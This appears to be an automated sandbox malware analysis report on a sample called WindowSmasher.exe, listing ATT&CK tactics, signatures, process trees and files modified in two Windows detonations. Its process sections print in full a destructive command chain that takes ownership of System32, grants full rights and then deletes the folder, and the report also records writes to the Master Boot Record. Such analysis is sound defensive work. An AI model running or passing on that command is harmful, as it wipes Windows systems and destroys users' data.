Malware Analysis Report

2024-09-11 05:56

Sample ID 240526-m871esgb61
Target WindowSmasher.exe
SHA256 740132589dc9d15750162db9ac327007d717e186b6c83442af0282b3bbb08105
Tags
bootkit discovery exploit persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

740132589dc9d15750162db9ac327007d717e186b6c83442af0282b3bbb08105

Threat Level: Likely malicious

The file WindowSmasher.exe was found to be: Likely malicious.

Malicious Activity Summary

bootkit discovery exploit persistence

Possible privilege escalation attempt

Manipulates Digital Signatures

Drops file in Drivers directory

Checks computer location settings

Modifies file permissions

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Pre-OS Boot
T1542
Bootkit
T1542.003
Privilege Escalation
TA0004
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Pre-OS Boot
T1542
Bootkit
T1542.003
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-26 11:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 11:09

Reported

2024-05-26 11:11

Platform

win10-20240404-en

Max time kernel

133s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gm.dls C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\fwpkclnt.sys.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui C:\Windows\SysWOW64\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\wintrust.dll C:\Windows\SysWOW64\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\dcomcnfg.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\srcore.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\SensorsCpl.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\uk-UA\webcheck.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\AppCapture.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\DWrite.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\mcicda.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\schedsvc.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\tapi32.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\InputSwitch.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\samlib.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\wsmplpxy.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\d3d8thk.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\sti.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\Windows.UI.Xaml.Controls.Private.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\Taskmgr.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\reagentc.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\cemapi.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\provcore.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\tracert.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\iasrad.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\wextract.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\SensorsApi.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\wlidcli.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Windows.StateRepositoryBroker.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WINDOW~1\v1.0\Modules\NetQos\MSFT_NetQosPolicy.Types.ps1xml C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\esrb.rs.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\bcrypt.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\MsSpellCheckingFacility.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\nshhttp.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msdadiag.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\OskSupport.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\SPEECH~1\Common\en-US\VES-Disambiguation.0409.grxml C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\uk-UA\appmgmts.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\uk-UA\WebcamUi.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Windows.Gaming.Preview.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\F12\uk-UA\F12Platform2.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\loghours.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\pautoenr.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\nlmsprep.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\prevhost.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\bdaplgin.ax C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\dinput8.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\msg711.acm.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\sxstrace.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\mssitlb.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\MSVPXENC.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\uxtheme.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\SMBHelperClass.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\cmstplua.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\ESENT.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\KBDHE.DLL C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\KBDMLT48.DLL C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\wbem\IMAPIv2-FileSystemSupport.mof C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\comdlg32.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Dism\DmiProvider.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\DOWNLE~1\API-MS-Win-core-localization-obsolete-l1-2-0.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\DOWNLE~1\api-ms-win-service-management-l2-1-0.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\AuthBrokerUI.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\netjoin.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\replace.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\netbtugc.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\PRINTI~1\es-ES\prnport.vbs C:\Windows\SysWOW64\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 204 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1136 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1136 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1136 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1136 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1136 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe

"C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /F C:\Windows\System32\* /A & icacls C:\Windows\System32 /grant administrators:F /T & RD /S /Q C:\Windows\System32

C:\Windows\SysWOW64\takeown.exe

takeown /F C:\Windows\System32\* /A

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /T

C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe

"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 11:09

Reported

2024-05-26 11:11

Platform

win10v2004-20240508-en

Max time kernel

115s

Max time network

107s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gm.dls C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui C:\Windows\SysWOW64\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\wintrust.dll C:\Windows\SysWOW64\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\DriverStore\en-US\wvmgid.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\wpdcomp.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\cmlua.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\TtlsAuth.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\es-ES\wecsvc.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\WWAHost.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\explorer.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\ehstortcgdrv.inf_amd64_5cb0c23f45dac01c\EhStorTcgDrv.sys C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\ja-JP\BasicRender.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\appmgr.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Configuration\Registration\MSFT_FileDirectoryConfiguration\MSFT_FileDirectoryConfiguration.Registration.mof C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msfeedsbs.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WinMetadata\Windows.System.winmd C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\it-IT\net44amd.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\uk-UA\c_diskdrive.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\jscript.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\msux64w10.INF_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\uiccspb.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netl260a.inf_amd64_783312763f8749c7\l260x64.sys C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\sxproxy.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\comsvcs.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\da-DK\comctl32.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\devicengccredprov.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\FusionV2.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\eappgnui.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetworkTransition\MSFT_NetNatTransitionConfiguration.format.ps1xml C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\en-US\avc.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\en-US\uaspstor.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\MDMIRM~1.INF\mdmirmdm.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\fr-FR\usbcir.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\iepeers.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\iertutil.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\RemoveDeviceContextHandler.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\F12\uk-UA\IEChooser.exe.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ucrtbase.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ArchiveResource\ja-JP\ArchiveProvider.psd1 C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\comexp.msc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\mycomput.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\rastapi.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\spfileq.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\webcheck.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\wbem\msfeeds.mof C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\BluetoothApis.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\netr28x.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\ja-JP\whvcrash.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\F12\F12Platform2.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\Dism\it-IT\TransmogProvider.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\ja-JP\c_media.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\ja-JP\objsel.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\en\Microsoft.Windows.Firewall.Commands.Resources.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\winrm\0C0A\winrm.ini C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\mpr.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\pl-PL\comctl32.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\sqlwoa.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msdrm.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcr120_clr0400.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\uk-UA\PeerDist.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Provisioning\wiminterop.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\de-DE\DevDispItemProvider.dll.mui C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\es-ES\c_netdriver.inf_loc C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netrtwlane.inf_amd64_20caba88bd7f0bb3\netrtwlane.inf C:\Windows\SysWOW64\cmd.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
